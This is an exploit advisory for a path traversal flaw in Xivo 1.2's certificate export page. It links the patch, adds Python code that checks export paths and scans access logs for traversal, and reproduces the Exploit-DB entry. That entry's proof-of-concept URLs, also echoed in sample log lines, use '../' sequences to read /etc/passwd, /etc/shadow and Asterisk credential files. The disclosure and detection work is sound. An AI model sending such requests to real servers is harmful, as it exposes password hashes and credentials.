Vendor: Xivo
By: Mr.Un1k0d3r
CVSS: 7.5 (HIGH)
Vulnerability type: Arbitrary File Download
CWE: 22
Product Name: Xivo
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:xivo:xivo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux xivo 2.6.32-5-486
2012

Xivo 1.2 Arbitrary File Download under root privileges

Using the web interface of Xivo 1.2, an attacker can download any file from the system, because the web application runs with root privileges. This allows an attacker to retrieve files containing cleartext passwords, /etc/passwd, /etc/shadow and many more.

Mitigation:

The vulnerability was fixed in the last patched version of Xivo 1.2. The patch can be found at https://projects.xivo.fr/issues/3912 and http://git.xivo.fr/?p=official/xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19.
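The flaw is that the certificate export's `id` parameter is used as a file path without being confined to the certificate store, so `../` sequences reach arbitrary files. The following Python is an added example, not Xivo's code or the linked patch: a containment check of the kind the export handler needed, plus a scan over constructed access-log lines that flags export requests whose `id` would escape the store. The certificate directory path is assumed (the advisory does not name it); the endpoint path is taken from the PoC URLs.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, urlsplit

CERT_DIR = PurePosixPath("/var/lib/xivo/certificates")  # assumed; the advisory names no store path
EXPORT_PATH = "/xivo/configuration/index.php/manage/certificate/"  # from the PoC URLs


def resolve_export_target(cert_id):
    """Map a certificate id to a path under CERT_DIR, or return None when the id is
    absolute, carries a NUL byte, or climbs above CERT_DIR (the missing containment check)."""
    if "\x00" in cert_id or cert_id.startswith("/"):
        return None
    stack = []
    for seg in cert_id.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:  # '..' with nothing left to pop escapes the store
                return None
            stack.pop()
        else:
            stack.append(seg)
    return str(CERT_DIR.joinpath(*stack)) if stack else None


# Constructed access-log lines (not from the advisory), common log format.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Jun/2012:10:01:02 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=export&id=server HTTP/1.1" 200 1842',
    '10.0.0.9 - - [11/Jun/2012:10:02:17 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd HTTP/1.1" 200 1203',
    '10.0.0.9 - - [11/Jun/2012:10:02:18 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=export&id=..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 901',
    '10.0.0.7 - - [11/Jun/2012:10:03:00 +0000] "GET /xivo/index.php HTTP/1.1" 200 4410',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_exports(lines):
    """Return (client_ip, decoded_id) for export requests whose id would escape CERT_DIR."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or url.path != EXPORT_PATH:
            continue
        query = parse_qs(url.query)  # percent-decodes, so an encoded %2F is matched as '/'
        if query.get("act") != ["export"]:
            continue
        for cert_id in query.get("id", []):
            if resolve_export_target(cert_id) is None:
                hits.append((line.split()[0], cert_id))
    return hits
```

Matching on the decoded query rather than the raw request line is what keeps the percent-encoded variant from slipping past the check.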

Exploit-DB raw data:

Xivo 1.2 Arbitrary File Download under root privileges
===============================================================

Date: 6/11/2012
Exploit Author: Mr.Un1k0d3r
Vendor Homepage: https://wiki.xivo.fr
Software Link: https://wiki.xivo.fr/index.php/XiVO_1.1-Gallifrey/Install_XiVO_With_CD
Version: 1.2 (last patched version)
Tested on: Linux xivo 2.6.32-5-486

Exploit:
Using the web interface you can download any file from the system. The web application is running under root privileges.
You can download clear text passwords, /etc/passwd, /etc/shadow and many more...

POC:
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/shadow
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/manager.conf
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/cel_pgsql.conf

This vulnerability was discovered by Mr.Un1k0d3r from RingZer0 Team.

Exploit-DB Note:
This appears to have been fixed
https://projects.xivo.fr/issues/3912
http://git.xivo.fr/?p=official/xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19